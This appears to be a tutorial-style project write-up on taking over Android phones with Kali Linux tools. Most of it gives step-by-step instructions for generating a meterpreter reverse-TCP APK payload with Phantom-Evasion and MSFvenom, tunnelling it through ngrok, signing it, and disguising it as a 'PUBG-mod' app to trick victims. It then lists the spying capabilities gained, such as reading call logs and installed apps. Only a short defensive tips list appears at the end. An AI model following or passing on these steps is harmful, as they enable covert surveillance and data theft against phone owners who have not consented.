This project demonstrates how to hack mobile phones using Kali Linux tools. It allows spying on any mobile device and obtaining various details such as installed applications, geolocation, contacts, and even performing mischievous actions like playing random music files. The main technique is to create a payload using the Kali Linux terminal and send it to the victim's mobile phone. After the installation of the payload app, it sends all the data of the victim's mobile phone, granting remote access to the Android device.
- Install the pentesting tool lPhantom Evasion
git clone https://github.com/oddcod3/Phantom-Evasion
python3 phantom-evasion.py --setup
- Download ngrok
- Launch Phantom-Evasion in interactive mode using the command
python3 phantom-evasion.py
. - Choose the Android modules.
- Use MSFvenom for generating the payload and save it as an APK file.
- Set up a listener to the Metasploit framework for Android using the default
Android/meterpreter/reverse_tcp
payload. - Insert the LHOST (Local Host IP) and LocalPort which will be established in the Ngrok session.
Android devices only install signed APK files. Sign the APK file manually in Kali Linux using:
- Keytool (Pre-installed)
- jar signer (Pre-installed)
- zipalign (Included in Phantom Evasion)
Set the name of the generated APK file to something enticing, for example: "PUBG-mod," to increase the chances of the victim installing the app.
- Use the Kali Linux tool Metasploit by entering the
msfconsole
command. - Use
multi/handler
and set the payload asandroid/meterpreter/reverse_tcp
. - Set the LHOST (IP address of the hacking PC) and LPORT (typically 4444).
- Set
ExitOnSession
tofalse
to continue searching and creating sessions with the APK without restarting the hacking process.
- Get the system information of the Android device on which the payload APK is installed.
- Get details of the installed apps on the phone.
- Get any application on the victim's mobile to run and open its main activity.
- Get detailed information about the call log of the victim's mobile.
- Maliciously play audio files on the victim's Android device.
How to protect your android phone from such attacks?
- Don't allow downloading apps from cloud websites that ask for many unnecessary permissions.
- Don't install apps with unknown resources enabled.
- Use antivirus software on mobile devices to monitor activity.
- Always confirm the source of files before downloading.